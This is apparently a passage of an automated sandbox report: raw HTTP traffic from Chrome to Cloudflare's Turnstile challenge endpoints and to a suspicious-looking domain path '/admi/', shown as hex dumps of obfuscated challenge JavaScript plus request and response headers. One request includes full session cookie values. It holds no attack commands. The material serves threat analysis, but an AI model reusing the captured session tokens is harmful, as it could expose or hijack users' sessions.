                                                                                                                                                                                                                                                                            Data Ascii: h,i){return h<i},'IsujQ':function(h,i){return h(i)},'qCFWV':function(h,i){return h|i},'zJQcW':function(h,i){return h<<i},'UlXNw':function(h,i){return h<i},'aMiqc':function(h,i){return i&h},'rxWej':function(h,i){return h==i},'PWTbE':function(h,i){return h<
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1369INData Raw: 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 59 2c 6a 2c 6b 29 7b 69 66 28 67 59 3d 62 2c 6a 3d 7b 7d 2c 6a 5b 67 59 28 31 33 32 36 29 5d 3d 67 59 28 33 33 39 29 2c 6b 3d 6a 2c 67 59 28 32 38 36 29 3d 3d 3d 64 5b 67 59 28 37 32 31 29 5d 29 72 65 74 75 72 6e 20 67 59 28 31 33 38 39 29 5b 67 59 28 31 30 34 32 29 5d 28 69 29 3b 65 6c 73 65 20 69 5b 67 59 28 31 35 37 33 29 5d 28 67 59 28 31 35 32 30 29 2c 66 75 6e 63 74 69 6f 6e 28 67 5a 2c 78 29 7b 28 67 5a 3d 67 59 2c 6b 5b 67 5a 28 33 33 39 29 5d 29 26 26 28 78 3d 7b 7d 2c 78 5b 67 5a 28 35 35 38 29 5d 3d 67 5a 28 31 33 30 31 29 2c 78 5b 67 5a 28 34 31 31 29 5d 3d 6f 5b 67 5a 28 36 37 37 29
                                                                                                                                                                                                                                                                            Data Ascii: 'h':function(h){return h==null?'':f.g(h,6,function(i,gY,j,k){if(gY=b,j={},j[gY(1326)]=gY(339),k=j,gY(286)===d[gY(721)])return gY(1389)[gY(1042)](i);else i[gY(1573)](gY(1520),function(gZ,x){(gZ=gY,k[gZ(339)])&&(x={},x[gZ(558)]=gZ(1301),x[gZ(411)]=o[gZ(677)
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1369INData Raw: 37 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 68 30 28 36 36 35 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4f 3d 78 5b 43 5d 2c 73 3d 30 3b 64 5b 68 30 28 36 33 31 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 68 30 28 31 35 38 34 29 5d 28 48 2c 31 29 7c 64 5b 68 30 28 31 31 36 33 29 5d 28 4f 2c 31 29 2c 49 3d 3d 64 5b 68 30 28 33 30 35 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 68 30 28 37 39 38 29 5d 28 64 5b 68 30 28 35 30 34 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 44 2d 2d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 78 5b 4c 5d 3d 45 2b 2b 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d
                                                                                                                                                                                                                                                                            Data Ascii: 7)](0,D)&&(D=Math[h0(665)](2,F),F++),delete B[C]}else for(O=x[C],s=0;d[h0(631)](s,F);H=d[h0(1584)](H,1)|d[h0(1163)](O,1),I==d[h0(305)](j,1)?(I=0,G[h0(798)](d[h0(504)](o,H)),H=0):I++,O>>=1,s++);continue;case'3':D--;continue;case'4':x[L]=E++;continue}break}
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1369INData Raw: 31 33 39 32 36 39 39 33 2c 33 33 38 32 34 31 38 39 35 2c 36 36 36 33 30 37 32 30 35 2c 37 37 33 35 32 39 39 31 32 2c 31 32 39 34 37 35 37 33 37 32 2c 31 33 39 36 31 38 32 32 39 31 2c 31 36 39 35 31 38 33 37 30 30 2c 31 39 38 36 36 36 31 30 35 31 2c 32 31 37 37 30 32 36 33 35 30 2c 32 34 35 36 39 35 36 30 33 37 2c 32 37 33 30 34 38 35 39 32 31 2c 32 38 32 30 33 30 32 34 31 31 2c 33 32 35 39 37 33 30 38 30 30 2c 33 33 34 35 37 36 34 37 37 31 2c 33 35 31 36 30 36 35 38 31 37 2c 33 36 30 30 33 35 32 38 30 34 2c 34 30 39 34 35 37 31 39 30 39 2c 32 37 35 34 32 33 33 34 34 2c 34 33 30 32 32 37 37 33 34 2c 35 30 36 39 34 38 36 31 36 2c 36 35 39 30 36 30 35 35 36 2c 38 38 33 39 39 37 38 37 37 2c 39 35 38 31 33 39 35 37 31 2c 31 33 32 32 38 32 32 32 31 38 2c 31 35
                                                                                                                                                                                                                                                                            Data Ascii: 13926993,338241895,666307205,773529912,1294757372,1396182291,1695183700,1986661051,2177026350,2456956037,2730485921,2820302411,3259730800,3345764771,3516065817,3600352804,4094571909,275423344,430227734,506948616,659060556,883997877,958139571,1322822218,15
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1369INData Raw: 37 5d 3d 62 6b 28 61 32 2c 53 5b 37 5d 29 7d 72 65 74 75 72 6e 20 53 7d 7d 66 6f 72 28 4f 3d 32 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 30 28 31 34 38 33 29 5d 28 48 3c 3c 31 2e 37 38 2c 64 5b 68 30 28 39 32 31 29 5d 28 4f 2c 31 29 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 30 28 37 39 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 64 5b 68 30 28 34 34 34 29 5d 28 49 2c 64 5b 68 30 28 31 36 36 36 29 5d 28 6a 2c 31 29 29 29 7b 47 5b 68 30 28 37 39 38 29 5d 28 64 5b 68 30 28 31 31 38 30 29 5d 28 6f 2c 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 68 30 28 37 30 31 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                            Data Ascii: 7]=bk(a2,S[7])}return S}}for(O=2,s=0;s<F;H=d[h0(1483)](H<<1.78,d[h0(921)](O,1)),j-1==I?(I=0,G[h0(798)](o(H)),H=0):I++,O>>=1,s++);for(;;)if(H<<=1,d[h0(444)](I,d[h0(1666)](j,1))){G[h0(798)](d[h0(1180)](o,H));break}else I++;return G[h0(701)]('')},'j':functio
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1369INData Raw: 64 5b 68 33 28 31 36 33 33 29 5d 28 64 5b 68 33 28 38 35 30 29 5d 28 30 2c 51 29 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 52 3d 4d 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 68 33 28 36 36 35 29 5d 28 32 2c 38 29 2c 49 3d 31 3b 4e 21 3d 49 3b 51 3d 64 5b 68 33 28 38 34 39 29 5d 28 4a 2c 4b 29 2c 4b 3e 3e 3d 31 2c 64 5b 68 33 28 31 35 37 32 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 28 64 5b 68 33 28 35 39 39 29 5d 28 30 2c 51 29 3f 31 3a 30 29 2a 49 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 65 28 4d 29 2c 52 3d 45 2d 31 2c 44 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 68 33 28 36 36 35 29 5d 28 32 2c 31 36 29 2c
                                                                                                                                                                                                                                                                            Data Ascii: d[h3(1633)](d[h3(850)](0,Q)?1:0,I),I<<=1);switch(R=M){case 0:for(M=0,N=Math[h3(665)](2,8),I=1;N!=I;Q=d[h3(849)](J,K),K>>=1,d[h3(1572)](0,K)&&(K=o,J=s(L++)),M|=(d[h3(599)](0,Q)?1:0)*I,I<<=1);C[E++]=e(M),R=E-1,D--;break;case 1:for(M=0,N=Math[h3(665)](2,16),
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1369INData Raw: 32 35 35 29 2d 68 2c 67 25 36 35 35 33 35 29 2c 36 35 35 33 35 29 2c 32 35 35 29 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 68 34 28 37 30 31 29 5d 28 27 27 29 7d 2c 65 54 3d 5b 5d 2c 65 55 3d 30 3b 32 35 36 3e 65 55 3b 65 54 5b 65 55 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 38 38 34 29 5d 28 65 55 29 2c 65 55 2b 2b 29 3b 65 56 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 35 32 30 29 29 2c 65 57 3d 61 74 6f 62 28 67 4a 28 31 36 31 38 29 29 2c 65 4d 5b 67 4a 28 35 34 35 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 33 36 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 52 29 7b 69 66 28 68 52 3d 67 4a 2c 65 4d 5b 68 52 28 35 34 35 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 52 28 35 34 35 29 5d 3d 21 21 5b 5d 7d 2c 66 73 3d 30 2c 65 4e 5b 67 4a 28 38 30 30 29 5d 3d 3d 3d 67 4a 28 31 33
                                                                                                                                                                                                                                                                            Data Ascii: 255)-h,g%65535),65535),255))));return i[h4(701)]('')},eT=[],eU=0;256>eU;eT[eU]=String[gJ(884)](eU),eU++);eV=(0,eval)(gJ(520)),eW=atob(gJ(1618)),eM[gJ(545)]=![],eM[gJ(364)]=function(hR){if(hR=gJ,eM[hR(545)])return;eM[hR(545)]=!![]},fs=0,eN[gJ(800)]===gJ(13


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            16192.168.2.449761104.18.95.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:53 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:54 GMT
                                                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec5728bbb5f7c82-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            17192.168.2.449745172.67.211.2414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                            Host: j9lg.xbyhiqbjl.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/admi/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            Cookie: XSRF-TOKEN=eyJpdiI6Im9VYzc1a0g4YUgxWVB3d1VaVWlzcWc9PSIsInZhbHVlIjoiSHhvRVRDS0pqMXdWUkJQQWxBV1lxNVpHTVI2OElsSGxZaVpiSnRlQm5Ld2ZoT081T21pcHRMSHBUc1llMURBRzdqTU9PTjFtcVFtVUFwaGlUckdhSU1aMVNkVDM2Zld0YmhTd0ZjY1ZSRWJsazZXVHpUZkl3SXJ0MHVZcEpTU2IiLCJtYWMiOiJmMjg4OTVlYmQ5YTJhNmU2ZTdhZTA3MDBlZjUxZDY3MzNjYmViODY0ZGIwZmMzODI2NmY3NDllZTY2MTVmODZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjVkV0tLL05uUzE1R0swN253RFFiOFE9PSIsInZhbHVlIjoiNWd6b0dsa0JRaUtscW54bHJyZWsrNDl1SEozS0JoenMrVHF6YjBQbEhoMVU4QlE1TlBGQ2lUZGM4cEZNQjRIQzlBR2E0QUkzeFJxN21LcnFXVXpNZ0xXTkxCalVzdmUrVzU5Z1psNGU4SXlLY3FMRXA0cE9pRkRYV3laaWtOQjkiLCJtYWMiOiJlY2ZiNGFmYzNmMDRhNzU2YjkwMjQzYTExNTQ4ZTg3ODdmODZkMGM4NDM4N2JkNmNhYTQyNzc0ZWY2NGM2YjE5IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                            2024-12-03 17:58:55 UTC1071INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:54 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                            Age: 9335
                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdnBrsWGj%2Bueme9ecI62U2U%2B6XBPDLZtOkNaz4fAfDM12yYZCaWputbDAblYwu3T8lkLLf0BF83gyBlFbn1N1dHJugNeLwGEDpmnRA3whwB9SY%2BWDn8Cd9uC9K%2BSlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=35824&min_rtt=35754&rtt_var=13458&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2245&delivery_rate=79655&cwnd=181&unsent_bytes=0&cid=dc4b1aad5cbcd5c9&ts=59&x=0"
                                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec57290fe9e42ab-EWR
                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2080&min_rtt=2078&rtt_var=784&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1898&delivery_rate=1390476&cwnd=193&unsent_bytes=0&cid=f6f28e720414ceb6&ts=9919&x=0"
                                                                                                                                                                                                                                                                            2024-12-03 17:58:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            18192.168.2.449766104.18.94.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:55 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:56 GMT
                                                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec57297fffc729f-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            19192.168.2.449767104.18.94.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ec5727f9d0241a1&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:56 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                            Content-Length: 129752
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec572993dc87291-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 45 73 73 58 42 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                                                                                                                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65
                                                                                                                                                                                                                                                                            Data Ascii: lenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_feedback_report":"Having%20trouble%3F","human_button_text":"Verify%20you%20are%20human","turnstile_failure":"Error","feedback_report_output_subtitle":"Your%20fe
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 2c 67 36 2c 67 37 2c 67 38 2c 67 63 2c 67 64 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 39 37 36 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 38 33 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 36 30 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 34 37 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 33 39 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 39 37 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 34 31 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28
                                                                                                                                                                                                                                                                            Data Ascii: ,g6,g7,g8,gc,gd,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1976))/1+parseInt(gI(1683))/2*(-parseInt(gI(1860))/3)+-parseInt(gI(647))/4*(-parseInt(gI(639))/5)+parseInt(gI(1097))/6+parseInt(gI(1841))/7*(parseInt(
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 65 6f 66 20 45 72 72 6f 72 3f 66 5b 67 4d 28 34 38 38 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 35 35 35 29 5d 28 66 5b 67 4d 28 34 38 38 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 31 38 33 35 29 5d 28 66 5b 67 4d 28 34 38 38 29 5d 29 29 3a 66 5b 67 4d 28 34 38 38 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 35 35 35 29 5d 28 66 5b 67 4d 28 34 38 38 29 5d 29 2c 6b 3d 69 5b 67 4d 28 31 33 36 32 29 5d 28 68 2c 69 5b 67 4d 28 31 38 39 37 29 5d 29 2c 6c 3d 65 4d 5b 67 4d 28 36 38 32 29 5d 5b 67 4d 28 36 31 36 29 5d 3f 69 5b 67 4d 28 31 33 31 39 29 5d 28 27 68 2f 27 2b 65 4d 5b 67 4d 28 36 38 32 29 5d 5b 67 4d 28 36 31 36 29 5d 2c 27 2f 27 29 3a 27 27 2c 6d 3d 69 5b 67 4d 28 31 38 37 39 29 5d 28 69 5b 67 4d 28 35 35 36 29 5d 28 69 5b 67 4d 28 35 31 31 29 5d 28 69 5b 67 4d 28 35 31 31
                                                                                                                                                                                                                                                                            Data Ascii: eof Error?f[gM(488)]=JSON[gM(555)](f[gM(488)],Object[gM(1835)](f[gM(488)])):f[gM(488)]=JSON[gM(555)](f[gM(488)]),k=i[gM(1362)](h,i[gM(1897)]),l=eM[gM(682)][gM(616)]?i[gM(1319)]('h/'+eM[gM(682)][gM(616)],'/'):'',m=i[gM(1879)](i[gM(556)](i[gM(511)](i[gM(511
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 29 29 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 67 4e 28 31 38 37 38 29 5d 28 6b 29 2c 6c 29 26 26 28 67 4e 28 31 32 34 36 29 21 3d 3d 67 4e 28 31 32 34 36 29 3f 28 43 3d 21 21 5b 5d 2c 44 28 29 2c 65 5b 67 4e 28 31 33 39 32 29 5d 28 45 29 2c 65 5b 67 4e 28 31 33 39 32 29 5d 28 46 29 2c 65 5b 67 4e 28 31 33 39 32 29 5d 28 47 29 2c 65 5b 67 4e 28 31 33 35 34 29 5d 28 48 29 2c 49 26 26 65 5b 67 4e 28 31 30 36 31 29 5d 28 54 2c 55 29 2c 4c 5b 67 4e 28 36 38 32 29 5d 5b 67 4e 28 31 36 32 32 29 5d 21 3d 3d 30 26 26 28 56 3d 57 5b 67 4e 28 31 38 35 33 29 5d 28 58 2c 59 5b 67 4e 28 36 38 32 29 5d 5b 67 4e 28 31 36 32 32 29 5d 29 29 2c 51 5b 67 4e 28 36 36 31 29 5d 29 26 26 28 6f 3d 7b 7d 2c
